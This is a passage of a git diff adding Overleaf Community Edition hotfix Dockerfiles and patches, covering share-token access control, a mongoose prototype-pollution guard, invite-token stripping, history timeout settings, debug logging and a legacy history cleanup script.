+RUN patch -p0 < pr_13485.patch +RUN node genScript compile | bash diff --git a/server-ce/hotfix/4.0.4/pr_13485.patch b/server-ce/hotfix/4.0.4/pr_13485.patch new file mode 100644 index 0000000..14dc931 --- /dev/null +++ b/server-ce/hotfix/4.0.4/pr_13485.patch @@ -0,0 +1,389 @@ +--- services/web/app/src/Features/Collaborators/CollaboratorsController.js ++++ services/web/app/src/Features/Collaborators/CollaboratorsController.js +@@ -11,6 +11,7 @@ const Errors = require('../Errors/Errors') + const logger = require('@overleaf/logger') + const { expressify } = require('../../util/promises') + const { hasAdminAccess } = require('../Helpers/AdminAuthorizationHelper') ++const TokenAccessHandler = require('../TokenAccess/TokenAccessHandler') + + module.exports = { + removeUserFromProject: expressify(removeUserFromProject), +@@ -18,6 +19,7 @@ module.exports = { + getAllMembers: expressify(getAllMembers), + setCollaboratorInfo: expressify(setCollaboratorInfo), + transferOwnership: expressify(transferOwnership), ++ getShareTokens: expressify(getShareTokens), + } + + async function removeUserFromProject(req, res, next) { +@@ -114,3 +116,37 @@ async function _removeUserIdFromProject(projectId, userId) { + ) + await TagsHandler.promises.removeProjectFromAllTags(userId, projectId) + } ++ ++async function getShareTokens(req, res) { ++ const projectId = req.params.Project_id ++ const userId = SessionManager.getLoggedInUserId(req.session) ++ ++ let tokens ++ if (userId) { ++ tokens = await CollaboratorsGetter.promises.getPublicShareTokens( ++ ObjectId(userId), ++ ObjectId(projectId) ++ ) ++ } else { ++ // anonymous access, the token is already available in the session ++ const readOnly = TokenAccessHandler.getRequestToken(req, projectId) ++ tokens = { readOnly } ++ } ++ if (!tokens) { ++ return res.sendStatus(403) ++ } ++ ++ if (tokens.readOnly || tokens.readAndWrite) { ++ logger.info( ++ { ++ projectId, ++ userId: userId || 'anonymous', ++ ip: req.ip, ++ tokens: Object.keys(tokens), ++ }, ++ 'project tokens accessed' ++ ) ++ } ++ ++ res.json(tokens) ++} +--- services/web/app/src/Features/Collaborators/CollaboratorsGetter.js ++++ services/web/app/src/Features/Collaborators/CollaboratorsGetter.js +@@ -25,6 +25,7 @@ module.exports = { + getInvitedCollaboratorCount: callbackify(getInvitedCollaboratorCount), + getProjectsUserIsMemberOf: callbackify(getProjectsUserIsMemberOf), + isUserInvitedMemberOfProject: callbackify(isUserInvitedMemberOfProject), ++ getPublicShareTokens: callbackify(getPublicShareTokens), + userIsTokenMember: callbackify(userIsTokenMember), + getAllInvitedMembers: callbackify(getAllInvitedMembers), + promises: { +@@ -37,6 +38,7 @@ module.exports = { + getInvitedCollaboratorCount, + getProjectsUserIsMemberOf, + isUserInvitedMemberOfProject, ++ getPublicShareTokens, + userIsTokenMember, + getAllInvitedMembers, + }, +@@ -133,6 +135,40 @@ async function isUserInvitedMemberOfProject(userId, projectId) { + return false + } + ++async function getPublicShareTokens(userId, projectId) { ++ const memberInfo = await Project.findOne( ++ { ++ _id: projectId, ++ }, ++ { ++ isOwner: { $eq: ['$owner_ref', userId] }, ++ hasTokenReadOnlyAccess: { ++ $and: [ ++ { $in: [userId, '$tokenAccessReadOnly_refs'] }, ++ { $eq: ['$publicAccesLevel', PublicAccessLevels.TOKEN_BASED] }, ++ ], ++ }, ++ tokens: 1, ++ } ++ ) ++ .lean() ++ .exec() ++ ++ if (!memberInfo) { ++ return null ++ } ++ ++ if (memberInfo.isOwner) { ++ return memberInfo.tokens ++ } else if (memberInfo.hasTokenReadOnlyAccess) { ++ return { ++ readOnly: 
memberInfo.tokens.readOnly, ++ } ++ } else { ++ return {} ++ } ++} ++ + async function getProjectsUserIsMemberOf(userId, fields) { + const limit = pLimit(2) + const [readAndWrite, readOnly, tokenReadAndWrite, tokenReadOnly] = +--- services/web/app/src/Features/Collaborators/CollaboratorsRouter.js ++++ services/web/app/src/Features/Collaborators/CollaboratorsRouter.js +@@ -22,6 +22,10 @@ const rateLimiters = { + points: 200, + duration: 60 * 10, + }), ++ getProjectTokens: new RateLimiter('get-project-tokens', { ++ points: 200, ++ duration: 60 * 10, ++ }), + } + + module.exports = { +@@ -139,5 +143,12 @@ module.exports = { + CollaboratorsInviteController.acceptInvite, + AnalyticsRegistrationSourceMiddleware.clearSource() + ) ++ ++ webRouter.get( ++ '/project/:Project_id/tokens', ++ RateLimiterMiddleware.rateLimit(rateLimiters.getProjectTokens), ++ AuthorizationMiddleware.ensureUserCanReadProject, ++ CollaboratorsController.getShareTokens ++ ) + }, + } +--- services/web/app/src/Features/Editor/EditorController.js ++++ services/web/app/src/Features/Editor/EditorController.js +@@ -581,20 +581,7 @@ const EditorController = { + { newAccessLevel } + ) + if (newAccessLevel === PublicAccessLevels.TOKEN_BASED) { +- ProjectDetailsHandler.ensureTokensArePresent( +- projectId, +- function (err, tokens) { +- if (err) { +- return callback(err) +- } +- EditorRealTimeController.emitToRoom( +- projectId, +- 'project:tokens:changed', +- { tokens } +- ) +- callback() +- } +- ) ++ ProjectDetailsHandler.ensureTokensArePresent(projectId, callback) + } else { + callback() + } +--- services/web/app/src/Features/Editor/EditorHttpController.js ++++ services/web/app/src/Features/Editor/EditorHttpController.js +@@ -67,8 +67,6 @@ async function joinProject(req, res, next) { + if (!project) { + return res.sendStatus(403) + } +- // Hide access tokens if this is not the project owner +- TokenAccessHandler.protectTokens(project, privilegeLevel) + // Hide sensitive data if the user is restricted + if (isRestrictedUser) { + project.owner = { _id: project.owner._id } +--- services/web/app/src/Features/Project/ProjectController.js ++++ services/web/app/src/Features/Project/ProjectController.js +@@ -343,7 +343,7 @@ const ProjectController = { + const userId = SessionManager.getLoggedInUserId(req.session) + ProjectGetter.findAllUsersProjects( + userId, +- 'name lastUpdated publicAccesLevel archived trashed owner_ref tokens', ++ 'name lastUpdated publicAccesLevel archived trashed owner_ref', + (err, projects) => { + if (err != null) { + return next(err) +@@ -1072,7 +1072,6 @@ const ProjectController = { + // If a project is simultaneously trashed and archived, we will consider it archived but not trashed. 
+ const trashed = ProjectHelper.isTrashed(project, userId) && !archived + +- TokenAccessHandler.protectTokens(project, accessLevel) + const model = { + id: project._id, + name: project.name, +--- services/web/app/src/Features/Project/ProjectDetailsHandler.js ++++ services/web/app/src/Features/Project/ProjectDetailsHandler.js +@@ -207,14 +207,13 @@ async function ensureTokensArePresent(projectId) { + project.tokens.readOnly != null && + project.tokens.readAndWrite != null + ) { +- return project.tokens ++ return + } + await _generateTokens(project) + await Project.updateOne( + { _id: projectId }, + { $set: { tokens: project.tokens } } + ).exec() +- return project.tokens + } + + async function clearTokens(projectId) { +--- services/web/app/src/Features/Project/ProjectEditorHandler.js ++++ services/web/app/src/Features/Project/ProjectEditorHandler.js +@@ -49,7 +49,6 @@ module.exports = ProjectEditorHandler = { + ), + members: [], + invites, +- tokens: project.tokens, + imageName: + project.imageName != null + ? Path.basename(project.imageName) +--- services/web/app/src/Features/TokenAccess/TokenAccessHandler.js ++++ services/web/app/src/Features/TokenAccess/TokenAccessHandler.js +@@ -246,22 +246,6 @@ const TokenAccessHandler = { + }) + }, + +- protectTokens(project, privilegeLevel) { +- if (!project || !project.tokens) { +- return +- } +- if (privilegeLevel === PrivilegeLevels.OWNER) { +- return +- } +- if (privilegeLevel !== PrivilegeLevels.READ_AND_WRITE) { +- project.tokens.readAndWrite = '' +- project.tokens.readAndWritePrefix = '' +- } +- if (privilegeLevel !== PrivilegeLevels.READ_ONLY) { +- project.tokens.readOnly = '' +- } +- }, +- + getV1DocPublishedInfo(token, callback) { + // default to allowing access + if (!Settings.apis.v1 || !Settings.apis.v1.url) { +@@ -304,7 +288,6 @@ TokenAccessHandler.promises = promisifyAll(TokenAccessHandler, { + '_projectFindOne', + 'grantSessionTokenAccess', + 'getRequestToken', +- 'protectTokens', + ], + multiResult: { + validateTokenForAnonymousAccess: ['isValidReadAndWrite', 'isValidReadOnly'], +--- services/web/frontend/js/features/share-project-modal/components/link-sharing.js ++++ services/web/frontend/js/features/share-project-modal/components/link-sharing.js +@@ -1,4 +1,4 @@ +-import { useCallback, useState } from 'react' ++import { useCallback, useState, useEffect } from 'react' + import PropTypes from 'prop-types' + import { Button, Col, Row } from 'react-bootstrap' + import { Trans } from 'react-i18next' +@@ -10,6 +10,8 @@ import CopyLink from '../../../shared/components/copy-link' + import { useProjectContext } from '../../../shared/context/project-context' + import * as eventTracking from '../../../infrastructure/event-tracking' + import { useUserContext } from '../../../shared/context/user-context' ++import { getJSON } from '../../../infrastructure/fetch-json' ++import useAbortController from '../../../shared/hooks/use-abort-controller' + + export default function LinkSharing({ canAddCollaborators }) { + const [inflight, setInflight] = useState(false) +@@ -27,8 +29,7 @@ export default function LinkSharing({ canAddCollaborators }) { + ) + .then(() => { + // NOTE: not calling `updateProject` here as it receives data via +- // project:publicAccessLevel:changed and project:tokens:changed +- // over the websocket connection ++ // project:publicAccessLevel:changed over the websocket connection + // TODO: eventTracking.sendMB('project-make-token-based') when newPublicAccessLevel is 'tokenBased' + }) + .finally(() => { +@@ -106,7 +107,17 @@ 
PrivateSharing.propTypes = { + } + + function TokenBasedSharing({ setAccessLevel, inflight, canAddCollaborators }) { +- const { tokens } = useProjectContext() ++ const { _id: projectId } = useProjectContext() ++ ++ const [tokens, setTokens] = useState(null) ++ ++ const { signal } = useAbortController() ++ ++ useEffect(() => { ++ getJSON(`/project/${projectId}/tokens`, { signal }) ++ .then(data => setTokens(data)) ++ .catch(error => console.error(error)) ++ }, [projectId, signal]) + + return ( + +@@ -194,7 +205,17 @@ LegacySharing.propTypes = { + } + + export function ReadOnlyTokenLink() { +- const { tokens } = useProjectContext() ++ const { _id: projectId } = useProjectContext() ++ ++ const [tokens, setTokens] = useState(null) ++ ++ const { signal } = useAbortController() ++ ++ useEffect(() => { ++ getJSON(`/project/${projectId}/tokens`, { signal }) ++ .then(data => setTokens(data)) ++ .catch(error => console.error(error)) ++ }, [projectId, signal]) + + return ( + +--- services/web/frontend/js/features/share-project-modal/controllers/react-share-project-modal-controller.js ++++ services/web/frontend/js/features/share-project-modal/controllers/react-share-project-modal-controller.js +@@ -31,16 +31,6 @@ export default App.controller( + }) + } + +- /* tokens */ +- +- ide.socket.on('project:tokens:changed', data => { +- if (data.tokens != null) { +- $scope.$applyAsync(() => { +- $scope.project.tokens = data.tokens +- }) +- } +- }) +- + ide.socket.on('project:membership:changed', data => { + if (data.members) { + listProjectMembers($scope.project._id) +--- services/web/frontend/js/shared/context/mock/mock-ide.js ++++ services/web/frontend/js/shared/context/mock/mock-ide.js +@@ -27,10 +27,6 @@ export const getMockIde = () => { + zotero: false, + }, + publicAccessLevel: '', +- tokens: { +- readOnly: '', +- readAndWrite: '', +- }, + owner: { + _id: '', + email: '', +--- services/web/frontend/js/shared/context/project-context.js ++++ services/web/frontend/js/shared/context/project-context.js +@@ -28,10 +28,6 @@ export const projectShape = { + versioning: PropTypes.bool, + }), + publicAccessLevel: PropTypes.string, +- tokens: PropTypes.shape({ +- readOnly: PropTypes.string, +- readAndWrite: PropTypes.string, +- }), + owner: PropTypes.shape({ + _id: PropTypes.string.isRequired, + email: PropTypes.string.isRequired, +@@ -81,7 +77,6 @@ export function ProjectProvider({ children }) { + invites, + features, + publicAccesLevel: publicAccessLevel, +- tokens, + owner, + } = project || projectFallback + +@@ -94,7 +89,6 @@ export function ProjectProvider({ children }) { + invites, + features, + publicAccessLevel, +- tokens, + owner, + } + }, [ +@@ -105,7 +99,6 @@ export function ProjectProvider({ children }) { + invites, + features, + publicAccessLevel, +- tokens, + owner, + ]) diff --git a/server-ce/hotfix/4.0.5/Dockerfile b/server-ce/hotfix/4.0.5/Dockerfile new file mode 100644 index 0000000..f62bd56 --- /dev/null +++ b/server-ce/hotfix/4.0.5/Dockerfile @@ -0,0 +1,13 @@ +FROM sharelatex/sharelatex:4.0.4 + +# Patch: clear invite and invite tokens through the websocket +COPY pr_13427.patch . +RUN patch -p0 < pr_13427.patch + +# Patch: https://github.com/Automattic/mongoose/commit/f1efabf350522257364aa5c2cb36e441cf08f1a2 +COPY mongoose_proto.patch . +RUN patch -p0 < mongoose_proto.patch + +# Patch: Allow digits in PDF filenames +COPY pr_13122.patch . 
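pr_13122, shown below, fixes the filename sanitiser used for compile downloads: the old \P{L} class replaced every non-letter with an underscore, digits included, while the new class keeps letters and decimal digits. For example, with a hypothetical project named 'Report 2023':

const name = 'Report 2023'
name.replace(/\P{L}/gu, '_')           // 'Report_____'  (digits replaced too)
name.replace(/[^\p{L}\p{Nd}]/gu, '_')  // 'Report_2023'  (digits preserved)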
+RUN patch -p0 < pr_13122.patch diff --git a/server-ce/hotfix/4.0.5/mongoose_proto.patch b/server-ce/hotfix/4.0.5/mongoose_proto.patch new file mode 100644 index 0000000..d519ad9 --- /dev/null +++ b/server-ce/hotfix/4.0.5/mongoose_proto.patch @@ -0,0 +1,12 @@ +--- services/web/node_modules/mongoose/lib/document.js ++++ services/web/node_modules/mongoose/lib/document.js +@@ -739,6 +739,10 @@ function init(self, obj, doc, opts, prefix) { + + function _init(index) { + i = keys[index]; ++ // avoid prototype pollution ++ if (i === '__proto__' || i === 'constructor') { ++ return; ++ } + path = prefix + i; + schemaType = docSchema.path(path); diff --git a/server-ce/hotfix/4.0.5/pr_13122.patch b/server-ce/hotfix/4.0.5/pr_13122.patch new file mode 100644 index 0000000..3a1a5ff --- /dev/null +++ b/server-ce/hotfix/4.0.5/pr_13122.patch @@ -0,0 +1,11 @@ +--- services/web/app/src/Features/Compile/CompileController.js ++++ services/web/app/src/Features/Compile/CompileController.js +@@ -371,7 +371,7 @@ module.exports = CompileController = { + }, + + _getSafeProjectName(project) { +- return project.name.replace(/\P{L}/gu, '_') ++ return project.name.replace(/[^\p{L}\p{Nd}]/gu, '_') + }, + + deleteAuxFiles(req, res, next) { diff --git a/server-ce/hotfix/4.0.5/pr_13427.patch b/server-ce/hotfix/4.0.5/pr_13427.patch new file mode 100644 index 0000000..716b7ce --- /dev/null +++ b/server-ce/hotfix/4.0.5/pr_13427.patch @@ -0,0 +1,92 @@ +--- services/web/app/src/Features/Editor/EditorHttpController.js ++++ services/web/app/src/Features/Editor/EditorHttpController.js +@@ -73,6 +73,7 @@ async function joinProject(req, res, next) { + if (isRestrictedUser) { + project.owner = { _id: project.owner._id } + project.members = [] ++ project.invites = [] + } + // Only show the 'renamed or deleted' message once + if (project.deletedByExternalDataSource) { +--- services/web/app/src/Features/Project/ProjectEditorHandler.js ++++ services/web/app/src/Features/Project/ProjectEditorHandler.js +@@ -48,19 +48,13 @@ + deletedDocsFromDocstore + ), + members: [], +- invites, ++ invites: this.buildInvitesView(invites), + imageName: + project.imageName != null + ? 
Path.basename(project.imageName) + : undefined, + } + +- if (result.invites == null) { +- result.invites = [] +- } +- result.invites.forEach(invite => { +- delete invite.token +- }) + ;({ owner, ownerFeatures, members } = + this.buildOwnerAndMembersViews(members)) + result.owner = owner +@@ -99,7 +93,7 @@ + let owner = null + let ownerFeatures = null + const filteredMembers = [] +- for (const member of Array.from(members || [])) { ++ for (const member of members || []) { + if (member.privilegeLevel === 'owner') { + ownerFeatures = member.user.features + owner = this.buildUserModelView(member.user, 'owner') +@@ -128,24 +122,15 @@ + }, + + buildFolderModelView(folder) { +- let file + const fileRefs = _.filter(folder.fileRefs || [], file => file != null) + return { + _id: folder._id, + name: folder.name, +- folders: Array.from(folder.folders || []).map(childFolder => ++ folders: (folder.folders || []).map(childFolder => + this.buildFolderModelView(childFolder) + ), +- fileRefs: (() => { +- const result = [] +- for (file of Array.from(fileRefs)) { +- result.push(this.buildFileModelView(file)) +- } +- return result +- })(), +- docs: Array.from(folder.docs || []).map(doc => +- this.buildDocModelView(doc) +- ), ++ fileRefs: fileRefs.map(file => this.buildFileModelView(file)), ++ docs: (folder.docs || []).map(doc => this.buildDocModelView(doc)), + } + }, + +@@ -164,4 +149,21 @@ + name: doc.name, + } + }, ++ ++ buildInvitesView(invites) { ++ if (invites == null) { ++ return [] ++ } ++ return invites.map(invite => ++ _.pick(invite, [ ++ '_id', ++ 'createdAt', ++ 'email', ++ 'expires', ++ 'privileges', ++ 'projectId', ++ 'sendingUserId', ++ ]) ++ ) ++ }, + } diff --git a/server-ce/hotfix/4.0.6/Dockerfile b/server-ce/hotfix/4.0.6/Dockerfile new file mode 100644 index 0000000..dcd5c6d --- /dev/null +++ b/server-ce/hotfix/4.0.6/Dockerfile @@ -0,0 +1,4 @@ +FROM sharelatex/sharelatex:4.0.5 + +# Patch: Drop the old history collections and increase mongo query timeout +ADD clean_sl_history_data.js /overleaf/services/web/scripts/history/clean_sl_history_data.js diff --git a/server-ce/hotfix/4.0.6/clean_sl_history_data.js b/server-ce/hotfix/4.0.6/clean_sl_history_data.js new file mode 100644 index 0000000..a7497c8 --- /dev/null +++ b/server-ce/hotfix/4.0.6/clean_sl_history_data.js @@ -0,0 +1,70 @@ +// Increase default mongo query timeout from 1min to 1h +process.env.MONGO_SOCKET_TIMEOUT = process.env.MONGO_SOCKET_TIMEOUT || '360000' +const { waitForDb, db } = require('../../app/src/infrastructure/mongodb') + +async function main() { + await checkAllProjectsAreMigrated() + await setAllowDowngradeToFalse() + await deleteHistoryCollections() + console.log('Legacy history data cleaned up successfully') + process.exit(0) +} + +async function checkAllProjectsAreMigrated() { + console.log('checking all projects are migrated to Full Project History') + + const count = await db.projects.countDocuments({ + 'overleaf.history.display': { $ne: true }, + }) + + if (count === 0) { + console.log('All projects are migrated to Full Project History') + } else { + console.error( + `There are ${count} projects that are not migrated to Full Project History` + + ` please complete the migration before running this script again.` + ) + process.exit(1) + } +} + +async function setAllowDowngradeToFalse() { + console.log('unsetting `allowDowngrade` flag in all projects') + await db.projects.updateMany( + { + 'overleaf.history.id': { $exists: true }, + 'overleaf.history.allowDowngrade': true, + }, + { $unset: { 
'overleaf.history.allowDowngrade': 1 } } + ) + console.log('unsetting `allowDowngrade` flag in all projects - Done') +} + +async function deleteHistoryCollections() { + await gracefullyDropCollection(db.docHistory) + await gracefullyDropCollection(db.docHistoryIndex) + await gracefullyDropCollection(db.projectHistoryMetaData) +} + +async function gracefullyDropCollection(collection) { + const collectionName = collection.collectionName + console.log(`removing \`${collectionName}\` data`) + try { + await collection.drop() + } catch (err) { + if (err.code === 26) { + // collection already deleted + console.log(`removing \`${collectionName}\` data - Already removed`) + } else { + throw err + } + } + console.log(`removing \`${collectionName}\` data - Done`) +} + +waitForDb() + .then(main) + .catch(err => { + console.error(err) + process.exit(1) + }) diff --git a/server-ce/hotfix/4.1.1/Dockerfile b/server-ce/hotfix/4.1.1/Dockerfile new file mode 100644 index 0000000..55fc5b5 --- /dev/null +++ b/server-ce/hotfix/4.1.1/Dockerfile @@ -0,0 +1 @@ +FROM sharelatex/sharelatex:4.1.0 diff --git a/server-ce/hotfix/4.1.2/Dockerfile b/server-ce/hotfix/4.1.2/Dockerfile new file mode 100644 index 0000000..6669ec0 --- /dev/null +++ b/server-ce/hotfix/4.1.2/Dockerfile @@ -0,0 +1 @@ +FROM sharelatex/sharelatex:4.1.1 diff --git a/server-ce/hotfix/4.1.3/Dockerfile b/server-ce/hotfix/4.1.3/Dockerfile new file mode 100644 index 0000000..ed1c9ff --- /dev/null +++ b/server-ce/hotfix/4.1.3/Dockerfile @@ -0,0 +1,5 @@ +FROM sharelatex/sharelatex:4.1.2 + +# Patch: fix soft history retry in cron job +COPY history_soft_retry.patch . +RUN patch -p0 < history_soft_retry.patch diff --git a/server-ce/hotfix/4.1.3/history_soft_retry.patch b/server-ce/hotfix/4.1.3/history_soft_retry.patch new file mode 100644 index 0000000..a28855f --- /dev/null +++ b/server-ce/hotfix/4.1.3/history_soft_retry.patch @@ -0,0 +1,8 @@ +--- cron/project-history-retry-soft.sh ++++ cron/project-history-retry-soft.sh +@@ -8,4 +8,4 @@ echo "-----------------------------------" + + PROJECT_HISTORY_URL='http://localhost:3054' + +-curl -X POST "${PROJECT_HISTORY_URL}/retry/failures?failureType=hard&timeout=3600000&limit=10000" ++curl -X POST "${PROJECT_HISTORY_URL}/retry/failures?failureType=soft&timeout=3600000&limit=10000" diff --git a/server-ce/hotfix/4.1.4/Dockerfile b/server-ce/hotfix/4.1.4/Dockerfile new file mode 100644 index 0000000..e7120b9 --- /dev/null +++ b/server-ce/hotfix/4.1.4/Dockerfile @@ -0,0 +1,9 @@ +FROM sharelatex/sharelatex:4.1.3 + +# Patch: Make history-v1 http request timeout configurable +COPY pr_15409.patch / +RUN cd / && patch -p0 < pr_15409.patch + +# Patch: Add verbose logging for I/O in history-v1 +COPY pr_15410.patch . 
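The clean_sl_history_data.js script above (shipped in 3.5.11 and again in 4.0.6) raises the mongo socket timeout before dropping the history collections, since the drops can outlive the driver's one-minute default. Note the arithmetic, though: the fallback it installs, '360000' ms, is six minutes rather than the full hour its comment promises; an hour is 3600000 ms:

// millisecond arithmetic behind MONGO_SOCKET_TIMEOUT
const ONE_MINUTE = 60 * 1000       // 60000   - the driver default
const SIX_MINUTES = 6 * ONE_MINUTE // 360000  - the value the script sets
const ONE_HOUR = 60 * ONE_MINUTE   // 3600000 - the duration the comment names
process.env.MONGO_SOCKET_TIMEOUT =
  process.env.MONGO_SOCKET_TIMEOUT || String(ONE_HOUR)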
+RUN patch -p0 < pr_15410.patch diff --git a/server-ce/hotfix/4.1.4/pr_15409.patch b/server-ce/hotfix/4.1.4/pr_15409.patch new file mode 100644 index 0000000..865ec3f --- /dev/null +++ b/server-ce/hotfix/4.1.4/pr_15409.patch @@ -0,0 +1,90 @@ +--- overleaf/services/history-v1/config/custom-environment-variables.json ++++ overleaf/services/history-v1/config/custom-environment-variables.json +@@ -43,5 +43,6 @@ + }, + "clusterWorkers": "CLUSTER_WORKERS", + "maxFileUploadSize": "MAX_FILE_UPLOAD_SIZE", +- "httpsOnly": "HTTPS_ONLY" ++ "httpsOnly": "HTTPS_ONLY", ++ "httpRequestTimeout": "SHARELATEX_HISTORY_V1_HTTP_REQUEST_TIMEOUT" + } +--- etc/sharelatex/settings.js ++++ etc/sharelatex/settings.js +@@ -261,6 +261,10 @@ const settings = { + url: process.env.V1_HISTORY_URL || 'http://localhost:3100/api', + user: 'staging', + pass: process.env.STAGING_PASSWORD, ++ requestTimeout: parseInt( ++ process.env.SHARELATEX_HISTORY_V1_HTTP_REQUEST_TIMEOUT || '300000', // default is 5min ++ 10 ++ ), + }, + }, + references: {}, +diff --git a/services/history-v1/app.js b/services/history-v1/app.js +index 6b3a2ba8f89..2ad490fb6b6 100644 +--- overleaf/services/history-v1/app.js ++++ overleaf/services/history-v1/app.js +@@ -5,6 +5,7 @@ + // Metrics must be initialized before importing anything else + require('@overleaf/metrics/initialize') + ++const config = require('config') + const Events = require('events') + const BPromise = require('bluebird') + const express = require('express') +@@ -47,9 +48,9 @@ app.use(cors()) + security.setupSSL(app) + security.setupBasicHttpAuthForSwaggerDocs(app) + ++const HTTP_REQUEST_TIMEOUT = parseInt(config.get('httpRequestTimeout'), 10) + app.use(function (req, res, next) { +- // use a 5 minute timeout on all responses +- res.setTimeout(5 * 60 * 1000) ++ res.setTimeout(HTTP_REQUEST_TIMEOUT) + next() + }) + +--- overleaf/services/history-v1/config/default.json ++++ overleaf/services/history-v1/config/default.json +@@ -25,5 +25,6 @@ + "maxFileUploadSize": "52428800", + "databasePoolMin": "2", + "databasePoolMax": "10", +- "httpsOnly": "false" ++ "httpsOnly": "false", ++ "httpRequestTimeout": "300000" + } +--- overleaf/services/project-history/app/js/HistoryStoreManager.js ++++ overleaf/services/project-history/app/js/HistoryStoreManager.js +@@ -17,7 +17,7 @@ import * as Errors from './Errors.js' + import * as LocalFileWriter from './LocalFileWriter.js' + import * as HashManager from './HashManager.js' + +-const HTTP_REQUEST_TIMEOUT = 300 * 1000 // 5 minutes ++const HTTP_REQUEST_TIMEOUT = Settings.apis.history_v1.requestTimeout + + /** + * Container for functions that need to be mocked in tests +--- overleaf/services/project-history/config/settings.defaults.cjs ++++ overleaf/services/project-history/config/settings.defaults.cjs +@@ -20,6 +20,9 @@ module.exports = { + filestore: { + url: `http://${process.env.FILESTORE_HOST || 'localhost'}:3009`, + }, ++ history_v1: { ++ requestTimeout: parseInt(process.env.V1_REQUEST_TIMEOUT || '300000', 10), ++ }, + web: { + url: `http://${ + process.env.WEB_API_HOST || process.env.WEB_HOST || 'localhost' +--- overleaf/services/project-history/test/unit/js/HistoryStoreManager/HistoryStoreManagerTests.js ++++ overleaf/services/project-history/test/unit/js/HistoryStoreManager/HistoryStoreManagerTests.js +@@ -23,6 +23,7 @@ describe('HistoryStoreManager', function () { + filestore: { + url: 'http://filestore.sharelatex.production', + }, ++ history_v1: { requestTimeout: 123 }, + }, + } + this.latestChunkRequestArgs = sinon.match({ diff --git 
a/server-ce/hotfix/4.1.4/pr_15410.patch b/server-ce/hotfix/4.1.4/pr_15410.patch new file mode 100644 index 0000000..3fd7d45 --- /dev/null +++ b/server-ce/hotfix/4.1.4/pr_15410.patch @@ -0,0 +1,153 @@ +--- services/history-v1/api/controllers/projects.js ++++ services/history-v1/api/controllers/projects.js +@@ -194,18 +194,23 @@ async function getProjectBlob(req, res, next) { + const hash = req.swagger.params.hash.value + + const blobStore = new BlobStore(projectId) +- let stream ++ logger.debug({ projectId, hash }, 'getProjectBlob started') + try { +- stream = await blobStore.getStream(hash) +- } catch (err) { +- if (err instanceof Blob.NotFoundError) { +- return render.notFound(res) +- } else { +- throw err ++ let stream ++ try { ++ stream = await blobStore.getStream(hash) ++ } catch (err) { ++ if (err instanceof Blob.NotFoundError) { ++ return render.notFound(res) ++ } else { ++ throw err ++ } + } ++ res.set('Content-Type', 'application/octet-stream') ++ await pipeline(stream, res) ++ } finally { ++ logger.debug({ projectId, hash }, 'getProjectBlob finished') + } +- res.set('Content-Type', 'application/octet-stream') +- await pipeline(stream, res) + } + + async function getSnapshotAtVersion(projectId, version) { +--- services/history-v1/storage/lib/blob_store/index.js ++++ services/history-v1/storage/lib/blob_store/index.js +@@ -20,6 +20,7 @@ const projectKey = require('../project_key') + const streams = require('../streams') + const postgresBackend = require('./postgres') + const mongoBackend = require('./mongo') ++const logger = require('@overleaf/logger') + + const GLOBAL_BLOBS = new Map() + +@@ -34,9 +35,14 @@ function makeProjectKey(projectId, hash) { + async function uploadBlob(projectId, blob, stream) { + const bucket = config.get('blobStore.projectBucket') + const key = makeProjectKey(projectId, blob.getHash()) +- await persistor.sendStream(bucket, key, stream, { +- contentType: 'application/octet-stream', +- }) ++ logger.debug({ projectId, blob }, 'uploadBlob started') ++ try { ++ await persistor.sendStream(bucket, key, stream, { ++ contentType: 'application/octet-stream', ++ }) ++ } finally { ++ logger.debug({ projectId, blob }, 'uploadBlob finished') ++ } + } + + function getBlobLocation(projectId, hash) { +@@ -109,7 +115,12 @@ async function getStringLengthOfFile(byteLength, pathname) { + async function deleteBlobsInBucket(projectId) { + const bucket = config.get('blobStore.projectBucket') + const prefix = `${projectKey.format(projectId)}/` +- await persistor.deleteDirectory(bucket, prefix) ++ logger.debug({ projectId }, 'deleteBlobsInBucket started') ++ try { ++ await persistor.deleteDirectory(bucket, prefix) ++ } finally { ++ logger.debug({ projectId }, 'deleteBlobsInBucket finished') ++ } + } + + async function loadGlobalBlobs() { +@@ -202,9 +213,15 @@ class BlobStore { + async getString(hash) { + assert.blobHash(hash, 'bad hash') + +- const stream = await this.getStream(hash) +- const buffer = await streams.readStreamToBuffer(stream) +- return buffer.toString() ++ const projectId = this.projectId ++ logger.debug({ projectId, hash }, 'getString started') ++ try { ++ const stream = await this.getStream(hash) ++ const buffer = await streams.readStreamToBuffer(stream) ++ return buffer.toString() ++ } finally { ++ logger.debug({ projectId, hash }, 'getString finished') ++ } + } + + /** +--- services/history-v1/storage/lib/history_store.js ++++ services/history-v1/storage/lib/history_store.js +@@ -8,6 +8,7 @@ const path = require('path') + + const OError = 
require('@overleaf/o-error') + const objectPersistor = require('@overleaf/object-persistor') ++const logger = require('@overleaf/logger') + + const assert = require('./assert') + const persistor = require('./persistor') +@@ -70,6 +71,7 @@ HistoryStore.prototype.loadRaw = function historyStoreLoadRaw( + + const key = getKey(projectId, chunkId) + ++ logger.debug({ projectId, chunkId }, 'loadRaw started') + return BPromise.resolve() + .then(() => persistor.getObjectStream(BUCKET, key)) + .then(streams.gunzipStreamToBuffer) +@@ -80,6 +82,7 @@ HistoryStore.prototype.loadRaw = function historyStoreLoadRaw( + } + throw new HistoryStore.LoadError(projectId, chunkId).withCause(err) + }) ++ .finally(() => logger.debug({ projectId, chunkId }, 'loadRaw finished')) + } + + /** +@@ -102,6 +105,7 @@ HistoryStore.prototype.storeRaw = function historyStoreStoreRaw( + const key = getKey(projectId, chunkId) + const stream = streams.gzipStringToStream(JSON.stringify(rawHistory)) + ++ logger.debug({ projectId, chunkId }, 'storeRaw started') + return BPromise.resolve() + .then(() => + persistor.sendStream(BUCKET, key, stream, { +@@ -112,6 +116,7 @@ HistoryStore.prototype.storeRaw = function historyStoreStoreRaw( + .catch(err => { + throw new HistoryStore.StoreError(projectId, chunkId).withCause(err) + }) ++ .finally(() => logger.debug({ projectId, chunkId }, 'storeRaw finished')) + } + + /** +@@ -121,12 +126,13 @@ HistoryStore.prototype.storeRaw = function historyStoreStoreRaw( + * @return {Promise} + */ + HistoryStore.prototype.deleteChunks = function historyDeleteChunks(chunks) { ++ logger.debug({ chunks }, 'deleteChunks started') + return BPromise.all( + chunks.map(chunk => { + const key = getKey(chunk.projectId, chunk.chunkId) + return persistor.deleteObject(BUCKET, key) + }) +- ) ++ ).finally(() => logger.debug({ chunks }, 'deleteChunks finished')) + } + + module.exports = new HistoryStore() diff --git a/server-ce/hotfix/4.1.5/Dockerfile b/server-ce/hotfix/4.1.5/Dockerfile new file mode 100644 index 0000000..ca89588 --- /dev/null +++ b/server-ce/hotfix/4.1.5/Dockerfile @@ -0,0 +1,5 